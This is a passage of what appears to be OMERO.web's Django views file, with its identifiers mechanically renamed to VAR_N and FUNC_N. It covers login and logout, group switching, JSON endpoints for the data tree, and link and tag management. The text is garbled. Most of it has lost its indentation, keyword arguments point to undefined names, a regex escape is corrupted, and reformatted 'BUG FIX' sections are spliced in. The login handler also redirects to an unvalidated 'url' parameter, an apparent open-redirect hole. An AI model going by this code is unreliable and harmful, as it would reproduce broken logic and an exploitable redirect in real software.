    # getIntOrDefault() earlier in this file - confirm against original.
    VAR_51 = None
    VAR_52 = VAR_2.GET.get(VAR_3, VAR_4)
    if VAR_52 is not None:
        VAR_51 = VAR_241(VAR_52)
    return VAR_51
def FUNC_1(VAR_2, VAR_3):
    # Return the list of values for GET parameter VAR_3, dropping any
    # empty-string entries.
    VAR_51 = VAR_2.GET.getlist(VAR_3)
    return [VAR_318 for VAR_318 in VAR_51 if VAR_318 != ""]
def FUNC_2(VAR_2, VAR_3):
    # Deprecated shim: warns, then delegates to the webgateway helper
    # (imported above as webgateway_get_longs).
    warnings.warn(
        "Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
    )
    return webgateway_get_longs(VAR_2, VAR_3)
def FUNC_3(VAR_2, VAR_3, VAR_4):
    # Read GET parameter VAR_3 (default VAR_4) and coerce it to a boolean
    # via omero.gateway.utils.toBoolean (imported above).
    return toBoolean(VAR_2.GET.get(VAR_3, VAR_4))
@never_cache
@render_response()
def FUNC_4(VAR_2, VAR_5=None, **VAR_6):
VAR_53 = {"version": omero_version, "build_year": build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
VAR_53["template"] = settings.INDEX_TEMPLATE
except Exception:
VAR_53["template"] = "webclient/VAR_93.html"
VAR_53["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
VAR_53["template"] = "webclient/VAR_93.html"
return VAR_53
class CLASS_0(LoginView):
VAR_54 = "webclient/login.html"
VAR_55 = "OMERO.web"
def FUNC_80(self, VAR_2):
return self.handle_not_logged_in(VAR_2)
def FUNC_81(self, VAR_2, VAR_5, VAR_56):
if VAR_2.session.get("active_group"):
if (
VAR_2.session.get("active_group")
not in VAR_5.getEventContext().memberOfGroups
):
del VAR_2.session["active_group"]
if VAR_2.session.get("user_id"):
del VAR_2.session["user_id"]
if VAR_2.session.get("server_settings"):
del VAR_2.session["server_settings"]
if VAR_2.POST.get("noredirect"):
return HttpResponse("OK")
VAR_7 = VAR_2.GET.get("url")
if VAR_7 is None or len(VAR_7) == 0:
try:
VAR_7 = parse_url(settings.LOGIN_REDIRECT)
except Exception:
VAR_7 = VAR_350("webindex")
return HttpResponseRedirect(VAR_7)
def FUNC_82(self, VAR_2, VAR_57=None, VAR_22=None):
if VAR_22 is None:
VAR_337 = VAR_2.GET.get("server", VAR_2.POST.get("server"))
if VAR_337 is not None:
VAR_115 = {"server": unicode(VAR_337)}
VAR_22 = LoginForm(VAR_115=initial)
else:
VAR_22 = LoginForm()
VAR_53 = {
"version": omero_version,
"build_year": build_year,
"error": VAR_57,
"form": VAR_22,
}
VAR_7 = VAR_2.GET.get("url")
if VAR_7 is not None and len(VAR_7) != 0:
VAR_53["url"] = urlencode({"url": VAR_7})
if hasattr(settings, "LOGIN_LOGO"):
VAR_53["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
VAR_338 = VAR_350("webindex")
if settings.PUBLIC_URL_FILTER.search(VAR_338):
VAR_53["public_enabled"] = True
VAR_53["public_login_redirect"] = VAR_338
VAR_53["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
VAR_339 = re.match(
(
r"(?P<major>\VAR_362+)\."
r"(?P<minor>\VAR_362+)\."
r"(?P<patch>\VAR_362+\.?)?"
r"(?P<dev>(dev|a|b|rc)\VAR_362+)?.*"
),
omero_version,
)
VAR_340 = "^VAR_416%s\\.%s\\.[^-]+$" % (
VAR_339.group("major"),
VAR_339.group("minor"),
)
VAR_53["client_download_tag_re"] = VAR_340
VAR_53["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(VAR_2, self.template, VAR_53)
@login_required(ignore_login_fail=True)
def FUNC_5(VAR_2, VAR_5=None, **VAR_6):
return HttpResponse("OK")
@login_required()
def FUNC_6(VAR_2, VAR_5=None, VAR_7=None, **VAR_6):
FUNC_7(VAR_2)
VAR_7 = VAR_7 or VAR_350("webindex")
return HttpResponseRedirect(VAR_7)
def FUNC_7(VAR_2, VAR_8=None):
if VAR_8 is None:
VAR_8 = VAR_2.GET.get("active_group")
VAR_8 = int(VAR_8)
if (
"active_group" not in VAR_2.session
or VAR_8 != VAR_2.session["active_group"]
):
VAR_2.session.modified = True
VAR_2.session["active_group"] = VAR_8
def FUNC_8(VAR_2, VAR_9="All members"):
VAR_58 = (
VAR_2.session.get("server_settings")
.get("ui", {})
.get("menu", {})
.get("dropdown", {})
.get("everyone", {})
.get("label", VAR_9)
)
return {
"id": -1,
"omeName": VAR_58,
"firstName": VAR_58,
"lastName": "",
}
@login_required(login_redirect="webindex")
def FUNC_9(VAR_2, VAR_5=None, **VAR_6):
if VAR_2.method == "POST":
try:
try:
VAR_5.close()
except Exception:
VAR_0.error("Exception during FUNC_9.", exc_info=True)
finally:
VAR_2.session.flush()
return HttpResponseRedirect(VAR_350(settings.LOGIN_VIEW))
else:
VAR_53 = {"url": VAR_350("weblogout"), "submit": "Do you want to log out?"}
VAR_54 = "webgateway/base/includes/post_form.html"
return render(VAR_2, VAR_54, VAR_53)
def FUNC_10(VAR_2, VAR_10, VAR_5=None, VAR_7=None, **VAR_6):
VAR_2.session.modified = True
VAR_54 = VAR_6.get("template", None)
if VAR_54 is None:
if VAR_10 == "userdata":
VAR_54 = "webclient/VAR_158/containers.html"
elif VAR_10 == "usertags":
VAR_54 = "webclient/VAR_158/containers.html"
else:
VAR_54 = "webclient/%s/%s.html" % (VAR_10, menu)
VAR_59 = VAR_6.get("show", Show(VAR_5, VAR_2, VAR_10))
try:
VAR_242 = VAR_59.first_selected
except IncorrectMenuError as e:
return HttpResponseRedirect(e.uri)
VAR_60 = VAR_59.initially_open_owner
if VAR_2.GET.get("show", None) is not None and VAR_242 is None:
if (
settings.PUBLIC_ENABLED
and settings.PUBLIC_USER == VAR_5.getUser().getOmeName()
):
return HttpResponseRedirect("%s?VAR_7=%s" % (VAR_350("weblogin"), VAR_7))
if VAR_242 is not None:
FUNC_7(VAR_2, VAR_242.details.group.id.val)
VAR_61 = {}
VAR_62 = GlobalSearchForm(VAR_158=VAR_2.GET.copy())
if VAR_10 == "search":
if VAR_62.is_valid():
VAR_61["query"] = VAR_62.cleaned_data["search_query"]
VAR_7 = VAR_6.get("load_template_url", None)
if VAR_7 is None:
VAR_7 = VAR_350(viewname="load_template", args=[VAR_10])
VAR_8 = VAR_2.session.get("active_group") or VAR_5.getEventContext().groupId
VAR_63, VAR_64 = VAR_5.getObject("ExperimenterGroup", VAR_8).groupSummary()
VAR_65 = [u.id for u in VAR_63]
VAR_65.extend([u.id for u in VAR_64])
VAR_66 = VAR_2.GET.get("experimenter")
if VAR_60 is not None:
if VAR_2.session.get("user_id", None) != -1:
VAR_66 = VAR_60
try:
VAR_66 = VAR_241(VAR_66)
except Exception:
VAR_66 = None
if VAR_66 is not None:
if (
VAR_66
not in (
set(map(lambda x: x.id, VAR_63)) | set(map(lambda x: x.id, VAR_64))
)
and VAR_66 != -1
):
VAR_66 = None
if VAR_66 is None:
VAR_66 = VAR_2.session.get("user_id", None)
if VAR_66 is None or int(VAR_66) not in VAR_65:
if VAR_66 != -1: # All VAR_166 in VAR_101 is allowed
VAR_66 = VAR_5.getEventContext().userId
VAR_2.session["user_id"] = VAR_66
VAR_67 = list(VAR_5.getGroupsMemberOf())
VAR_67.sort(VAR_310=lambda x: x.getName().lower())
VAR_68 = VAR_67
VAR_69 = ContainerForm()
VAR_70 = {}
if VAR_10 == "search":
for g in VAR_68:
g.loadLeadersAndMembers()
for VAR_383 in g.leaders + g.colleagues:
VAR_70[VAR_383.id] = VAR_383
VAR_70 = list(VAR_70.values())
VAR_70.sort(VAR_310=lambda x: x.getLastName().lower())
VAR_53 = {
"menu": VAR_10,
"init": VAR_61,
"myGroups": VAR_67,
"new_container_form": VAR_69,
"global_search_form": VAR_62,
}
VAR_53["groups"] = VAR_68
VAR_53["myColleagues"] = VAR_70
VAR_53["active_group"] = VAR_5.getObject("ExperimenterGroup", VAR_241(VAR_8))
VAR_53["active_user"] = VAR_5.getObject("Experimenter", VAR_241(VAR_66))
VAR_53["initially_select"] = VAR_59.initially_select
VAR_53["initially_open"] = VAR_59.initially_open
VAR_53["isLeader"] = VAR_5.isLeader()
VAR_53["current_url"] = VAR_7
VAR_53["page_size"] = settings.PAGE
VAR_53["template"] = VAR_54
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
VAR_53["current_admin_privileges"] = VAR_5.getCurrentAdminPrivileges()
VAR_53["leader_of_groups"] = VAR_5.getEventContext().leaderOfGroups
return VAR_53
@login_required()
@render_response()
def FUNC_11(VAR_2, VAR_10, VAR_5=None, VAR_7=None, **VAR_6):
return FUNC_10(VAR_2=request, VAR_10=menu, VAR_5=conn, VAR_7=url, **VAR_6)
@login_required()
@render_response()
def FUNC_12(VAR_2, VAR_7=None, VAR_5=None, **VAR_6):
VAR_67 = list(VAR_5.getGroupsMemberOf())
VAR_67.sort(VAR_310=lambda x: x.getName().lower())
if VAR_5.isAdmin(): # Admin can see all VAR_68
VAR_243 = [
VAR_5.getAdminService().getSecurityRoles().userGroupId,
VAR_5.getAdminService().getSecurityRoles().guestGroupId,
]
VAR_68 = VAR_5.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
VAR_68 = [g for g in VAR_68 if g.getId() not in VAR_243]
VAR_68.sort(VAR_310=lambda x: x.getName().lower())
else:
VAR_68 = VAR_67
for g in VAR_68:
g.loadLeadersAndMembers() # load VAR_63 / VAR_64
VAR_53 = {
"template": "webclient/base/includes/FUNC_12.html",
"current_url": VAR_7,
"groups": VAR_68,
"myGroups": VAR_67,
}
return VAR_53
@login_required()
def FUNC_13(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_244 = FUNC_0(VAR_2, "member", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
VAR_68 = tree.marshal_groups(
VAR_5=conn, VAR_244=member_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"groups": VAR_68})
@login_required()
def FUNC_14(VAR_2, VAR_11, VAR_5=None, **VAR_6):
try:
VAR_11 = VAR_241(VAR_11)
except ValueError:
return HttpResponseBadRequest("Invalid VAR_341 id")
try:
if VAR_11 < 0:
VAR_341 = FUNC_8(VAR_2)
else:
VAR_341 = tree.marshal_experimenter(
VAR_5=conn, VAR_11=experimenter_id
)
if VAR_341 is None:
raise Http404("No Experimenter found with ID %s" % VAR_11)
return JsonResponse({"experimenter": VAR_341})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def FUNC_15(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_11 = FUNC_0(VAR_2, "id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_5.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
VAR_71 = dict()
try:
VAR_71["projects"] = tree.marshal_projects(
VAR_5=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["datasets"] = tree.marshal_datasets(
VAR_5=conn,
VAR_247=True,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["screens"] = tree.marshal_screens(
VAR_5=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["plates"] = tree.marshal_plates(
VAR_5=conn,
VAR_247=True,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
try:
VAR_342 = VAR_2.session["server_settings"]["ui"]["tree"]["orphans"]
except Exception:
VAR_342 = {"enabled": True}
if (
VAR_5.isAdmin()
or VAR_5.isLeader(VAR_335=VAR_2.session.get("active_group"))
or VAR_11 == VAR_5.getUserId()
or VAR_342.get("enabled", True)
):
VAR_247 = tree.marshal_orphaned(
VAR_5=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_247["name"] = VAR_342.get("name", "Orphaned Images")
VAR_71["orphaned"] = VAR_247
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(VAR_71)
@login_required()
def FUNC_16(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_245 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_5.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
try:
VAR_107 = tree.marshal_datasets(
VAR_5=conn, VAR_245=project_id, VAR_20=group_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"datasets": VAR_107})
@login_required()
def FUNC_17(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_246 = FUNC_0(VAR_2, "id", None)
VAR_247 = FUNC_3(VAR_2, "orphaned", False)
VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
VAR_249 = FUNC_3(VAR_2, "thumbVersion", False)
VAR_250 = FUNC_3(VAR_2, "date", False)
VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_5.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
VAR_25 = "share_id" in VAR_6 and VAR_241(VAR_6["share_id"]) or None
try:
VAR_106 = tree.marshal_images(
VAR_5=conn,
VAR_247=orphaned,
VAR_11=experimenter_id,
VAR_246=dataset_id,
VAR_25=share_id,
VAR_248=load_pixels,
VAR_20=group_id,
VAR_87=page,
VAR_250=date,
VAR_249=thumb_version,
VAR_88=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"images": VAR_106})
@login_required()
def FUNC_18(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_251 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_5.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
try:
VAR_110 = tree.marshal_plates(
VAR_5=conn, VAR_251=screen_id, VAR_20=group_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"plates": VAR_110})
@login_required()
def FUNC_19(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_252 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if VAR_252 is None:
return HttpResponseBadRequest("id (VAR_421) must be specified")
try:
VAR_253 = tree.marshal_plate_acquisitions(
VAR_5=conn, VAR_252=plate_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"acquisitions": VAR_253})
def FUNC_20(VAR_5, VAR_12, VAR_13, VAR_14, VAR_15):
if VAR_12 == "orphaned":
return None
VAR_72 = None
if VAR_12 == "experimenter":
if VAR_14 in ["dataset", "plate", "tag"]:
return None
elif VAR_12 == "project":
if VAR_14 == "dataset":
VAR_72 = "ProjectDatasetLink"
elif VAR_12 == "dataset":
if VAR_14 == "image":
VAR_72 = "DatasetImageLink"
elif VAR_12 == "screen":
if VAR_14 == "plate":
VAR_72 = "ScreenPlateLink"
elif VAR_12 == "tagset":
if VAR_14 == "tag":
VAR_72 = "AnnotationAnnotationLink"
if not VAR_72:
raise Http404("json VAR_158 needs 'parent_type' and 'child_type'")
VAR_73 = omero.sys.ParametersI()
VAR_73.addIds(VAR_15)
VAR_74 = VAR_5.getQueryService()
VAR_75 = (
"""
from %s olink join fetch olink.child join fetch olink.parent
where olink.child.id in (:VAR_187)
"""
% VAR_72
)
if VAR_13:
VAR_73.add("pid", rlong(VAR_13))
VAR_75 += " and olink.parent.id = :pid"
VAR_76 = VAR_74.findAllByQuery(VAR_75, VAR_73, VAR_5.SERVICE_OPTS)
if VAR_13 is not None and len(VAR_76) == 0:
raise Http404(
"No VAR_344 found for %s-%s to %s-%s"
% (VAR_12, VAR_13, VAR_14, VAR_15)
)
return VAR_72, VAR_76
def FUNC_21(VAR_12, VAR_13, VAR_14, VAR_16):
if VAR_12 == "experimenter":
if VAR_14 == "dataset" or VAR_14 == "plate":
return "orphan"
if VAR_12 == "project":
VAR_254 = ProjectI(VAR_241(VAR_13), False)
if VAR_14 == "dataset":
VAR_343 = DatasetI(VAR_241(VAR_16), False)
VAR_344 = ProjectDatasetLinkI()
VAR_344.setParent(VAR_254)
VAR_344.setChild(VAR_343)
return VAR_344
elif VAR_12 == "dataset":
VAR_343 = DatasetI(VAR_241(VAR_13), False)
if VAR_14 == "image":
VAR_142 = ImageI(VAR_241(VAR_16), False)
VAR_344 = DatasetImageLinkI()
VAR_344.setParent(VAR_343)
VAR_344.setChild(VAR_142)
return VAR_344
elif VAR_12 == "screen":
VAR_384 = ScreenI(VAR_241(VAR_13), False)
if VAR_14 == "plate":
VAR_421 = PlateI(VAR_241(VAR_16), False)
VAR_344 = ScreenPlateLinkI()
VAR_344.setParent(VAR_384)
VAR_344.setChild(VAR_421)
return VAR_344
elif VAR_12 == "tagset":
if VAR_14 == "tag":
VAR_344 = AnnotationAnnotationLinkI()
VAR_344.setParent(TagAnnotationI(VAR_241(VAR_13), False))
VAR_344.setChild(TagAnnotationI(VAR_241(VAR_16), False))
return VAR_344
return None
def FUNC_22(VAR_5, VAR_14, VAR_15):
if VAR_14 == "tag":
VAR_14 = "Annotation"
VAR_77 = {}
for VAR_38 in VAR_5.getObjects(VAR_14, VAR_15):
VAR_77[VAR_38.id] = VAR_38.details.owner.id.val
return VAR_77
@login_required()
def FUNC_23(VAR_2, VAR_5=None, **VAR_6):
    """Dispatch JSON link requests: POST creates links, DELETE removes them.

    Any other HTTP method gets a 405 response.
    """
    if VAR_2.method not in ["POST", "DELETE"]:
        # BUG FIX: `VAR_313=405` is not a JsonResponse kwarg; Django's
        # keyword for the HTTP status code is `status`.
        return JsonResponse(
            {"Error": "Need to POST or DELETE JSON VAR_158 to VAR_230 links"},
            status=405,
        )
    try:
        VAR_17 = json.loads(VAR_2.body)
    except TypeError:
        # Fallback when the body is a bytestring json.loads can't take
        VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
    if VAR_2.method == "POST":
        return FUNC_24(VAR_5, VAR_17)
    elif VAR_2.method == "DELETE":
        return FUNC_25(VAR_5, VAR_17)
def FUNC_24(VAR_5, VAR_17, **VAR_6):
    """Create the parent-child links described by the nested JSON payload.

    VAR_17 maps parent_type -> parent_id -> child_type -> [child_ids].
    Links are built via FUNC_21 and saved in one batch; if the batch save
    fails they are retried one at a time (best effort).  Returns a
    JsonResponse with {"success": bool}.
    """
    VAR_78 = {"success": False}
    VAR_79 = []
    # Admins holding WriteOwned may create links on behalf of other users
    VAR_80 = "WriteOwned" in VAR_5.getCurrentAdminPrivileges()
    VAR_66 = VAR_5.getUserId()
    for VAR_12, VAR_82 in VAR_17.items():
        if VAR_12 in ("orphaned", "experimenter"):
            continue
        for VAR_13, children in VAR_82.items():
            for VAR_14, VAR_15 in children.items():
                # child id -> owner id, used to preserve ownership below
                VAR_385 = FUNC_22(VAR_5, VAR_14, VAR_15)
                for VAR_16 in VAR_15:
                    VAR_13 = int(VAR_13)
                    VAR_344 = FUNC_21(VAR_12, VAR_13, VAR_14, VAR_16)
                    if VAR_344 and VAR_344 != "orphan":
                        # When linking another user's object, make that user
                        # the owner of the new link
                        if VAR_80 and VAR_385[VAR_16] != VAR_66:
                            VAR_344.details.owner = ExperimenterI(
                                VAR_385[VAR_16], False
                            )
                        VAR_79.append(VAR_344)
    if len(VAR_79) > 0:
        # Save in the group of the last parent processed.  NOTE(review):
        # this assumes all linked objects live in the same group — confirm.
        VAR_255 = VAR_12.title()
        if VAR_255 in ["Tagset", "Tag"]:
            VAR_255 = "TagAnnotation"
        VAR_256 = VAR_5.getQueryService().get(VAR_255, VAR_13, VAR_5.SERVICE_OPTS)
        VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_256.details.group.id.val)
        VAR_0.info("api_link: Saving %s links" % len(VAR_79))
        try:
            VAR_5.saveArray(VAR_79)
            VAR_78["success"] = True
        except Exception:
            VAR_0.info(
                "api_link: Exception on saveArray with %s links" % len(VAR_79)
            )
            # Batch save failed (e.g. one duplicate link): retry links
            # individually, silently skipping the ones that fail.
            for VAR_344 in VAR_79:
                try:
                    VAR_5.saveObject(VAR_344)
                except Exception:
                    pass
            VAR_78["success"] = True
    return JsonResponse(VAR_78)
def FUNC_25(VAR_5, VAR_17):
    """Delete the parent-child links described by the nested JSON payload.

    VAR_17 maps parent_type -> parent_id -> child_type -> [child_ids].
    After deleting, any links the children still have to *other* parents are
    collected into the response so the client can keep its tree in sync.
    """
    VAR_78 = {"success": False}
    for VAR_12, VAR_82 in VAR_17.items():
        if VAR_12 == "orphaned":
            continue
        for VAR_13, children in VAR_82.items():
            for VAR_14, VAR_15 in children.items():
                VAR_386 = FUNC_20(
                    VAR_5, VAR_12, VAR_13, VAR_14, VAR_15
                )
                if VAR_386 is None:
                    continue
                VAR_387, VAR_240 = VAR_386
                VAR_388 = [VAR_71.id.val for VAR_71 in VAR_240]
                VAR_0.info("api_link: Deleting %s links" % len(VAR_388))
                # wait=True: block until the server-side delete completes
                VAR_5.deleteObjects(VAR_387, VAR_388, wait=True)
                # Re-query with parent=None to find the children's links to
                # any other parents, and report those back
                VAR_387, VAR_389 = FUNC_20(
                    VAR_5, VAR_12, None, VAR_14, VAR_15
                )
                for rl in VAR_389:
                    VAR_359 = rl.parent.id.val
                    VAR_422 = rl.child.id.val
                    # Skip the parent we just unlinked from
                    if VAR_359 == int(VAR_13):
                        continue
                    if VAR_12 not in VAR_78:
                        VAR_78[VAR_12] = {}
                    if VAR_359 not in VAR_78[VAR_12]:
                        VAR_78[VAR_12][VAR_359] = {VAR_14: []}
                    VAR_78[VAR_12][VAR_359][VAR_14].append(VAR_422)
    VAR_78["success"] = True
    return JsonResponse(VAR_78)
@login_required()
def FUNC_26(VAR_2, VAR_5=None, **VAR_6):
    """Return JSON describing the parent links of the ids passed as
    ?image=, ?dataset= and ?plate= query parameters."""
    child_to_parent = {"image": "dataset", "dataset": "project", "plate": "screen"}
    payload = []
    for child_type, parent_type in child_to_parent.items():
        raw_values = VAR_2.GET.getlist(child_type)
        if len(raw_values) == 0:
            continue
        # Each query value may itself hold a comma-separated id list
        child_ids = [part for value in raw_values for part in value.split(",")]
        _link_type, links = FUNC_20(
            VAR_5, parent_type, None, child_type, child_ids
        )
        for link in links:
            payload.append(
                {
                    "id": link.id.val,
                    "parent": {"type": parent_type, "id": link.parent.id.val},
                    "child": {"type": child_type, "id": link.child.id.val},
                }
            )
    return JsonResponse({"data": payload})
@login_required()
def FUNC_27(VAR_2, VAR_5=None, **VAR_6):
    """Resolve the tree path(s) to the object(s) named by query parameters
    and return them as JSON."""
    try:
        experimenter_id = FUNC_0(VAR_2, "experimenter", None)
        project_id = FUNC_0(VAR_2, "project", None)
        dataset_id = FUNC_0(VAR_2, "dataset", None)
        image_id = FUNC_0(VAR_2, "image", None)
        screen_id = FUNC_0(VAR_2, "screen", None)
        plate_id = FUNC_0(VAR_2, "plate", None)
        acquisition_id = FUNC_0(VAR_2, "run", None)
        # "acquisition" overrides the legacy "run" parameter when present
        acquisition_id = FUNC_0(VAR_2, "acquisition", acquisition_id)
        well_id = VAR_2.GET.get("well", None)
        tag_id = FUNC_0(VAR_2, "tag", None)
        tagset_id = FUNC_0(VAR_2, "tagset", None)
        roi_id = FUNC_0(VAR_2, "roi", None)
        shape_id = FUNC_0(VAR_2, "shape", None)
        group_id = FUNC_0(VAR_2, "group", None)
        page_size = FUNC_0(VAR_2, "page_size", settings.PAGE)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if tag_id is not None or tagset_id is not None:
        paths = paths_to_tag(VAR_5, experimenter_id, tagset_id, tag_id)
    else:
        paths = paths_to_object(
            VAR_5,
            experimenter_id,
            project_id,
            dataset_id,
            image_id,
            screen_id,
            plate_id,
            acquisition_id,
            well_id,
            group_id,
            page_size,
            roi_id,
            shape_id,
        )
    return JsonResponse({"paths": paths})
@login_required()
def FUNC_28(VAR_2, VAR_5=None, **VAR_6):
    """Dispatch tag requests: GET lists tags, DELETE removes them.

    Other methods fall through and return None, as before.
    """
    handler = {"GET": FUNC_29, "DELETE": FUNC_30}.get(VAR_2.method)
    if handler is not None:
        return handler(VAR_2, VAR_5, **VAR_6)
def FUNC_29(VAR_2, VAR_5=None, **VAR_6):
    """Marshal tags (or objects tagged with one tag) to a JSON-ready dict.

    BUG FIX: the tree.marshal_* keyword values previously referenced
    undefined names (`conn`, `experimenter_id`, `tag_id`, ...), raising
    NameError at runtime; they now pass the locals parsed above.
    """
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_260 = FUNC_0(VAR_2, "id", None)
        VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
        VAR_247 = FUNC_3(VAR_2, "orphaned", False)
        VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
        VAR_250 = FUNC_3(VAR_2, "date", False)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        if VAR_260 is not None:
            # A specific tag id: marshal the objects carrying that tag
            VAR_266 = tree.marshal_tagged(
                VAR_5=VAR_5,
                VAR_11=VAR_11,
                VAR_260=VAR_260,
                VAR_20=VAR_20,
                VAR_87=VAR_87,
                VAR_248=VAR_248,
                VAR_250=VAR_250,
                VAR_88=VAR_88,
            )
        else:
            VAR_266 = {}
            VAR_266["tags"] = tree.marshal_tags(
                VAR_5=VAR_5,
                VAR_247=VAR_247,
                VAR_11=VAR_11,
                VAR_260=VAR_260,
                VAR_20=VAR_20,
                VAR_87=VAR_87,
                VAR_88=VAR_88,
            )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(VAR_266)
def FUNC_30(VAR_2, VAR_5=None, **VAR_6):
    """Delete the annotations whose ids appear in the request, waiting for
    the server-side delete to finish before responding."""
    try:
        annotation_ids = FUNC_2(VAR_2, "id")
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    handle = None
    try:
        # Submit every delete in a single DoAll batch
        batch = omero.cmd.DoAll()
        batch.requests = [
            omero.cmd.Delete("/Annotation", ann_id) for ann_id in annotation_ids
        ]
        handle = VAR_5.c.sf.submit(batch, VAR_5.SERVICE_OPTS)
        try:
            VAR_5._waitOnCmd(handle)
        finally:
            handle.close()
    except CmdError as e:
        return HttpResponseBadRequest(e.message)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse("")
@login_required()
def FUNC_31(VAR_2, VAR_5=None, **VAR_6):
    """Marshal annotations for the selected objects as JSON.

    BUG FIX: the tree.marshal_annotations keyword values previously
    referenced undefined names (`project_ids`, `dataset_ids`, ...),
    raising NameError; they now pass the locals parsed above.
    """
    VAR_71 = VAR_2.GET
    VAR_46 = FUNC_1(VAR_2, "image")
    VAR_45 = FUNC_1(VAR_2, "dataset")
    VAR_44 = FUNC_1(VAR_2, "project")
    VAR_47 = FUNC_1(VAR_2, "screen")
    VAR_48 = FUNC_1(VAR_2, "plate")
    VAR_85 = FUNC_1(VAR_2, "acquisition")
    VAR_86 = FUNC_1(VAR_2, "well")
    VAR_87 = FUNC_0(VAR_2, "page", 1)
    VAR_88 = FUNC_0(VAR_2, "limit", VAR_1)
    VAR_89 = VAR_71.get("type", None)
    VAR_90 = VAR_71.get("ns", None)
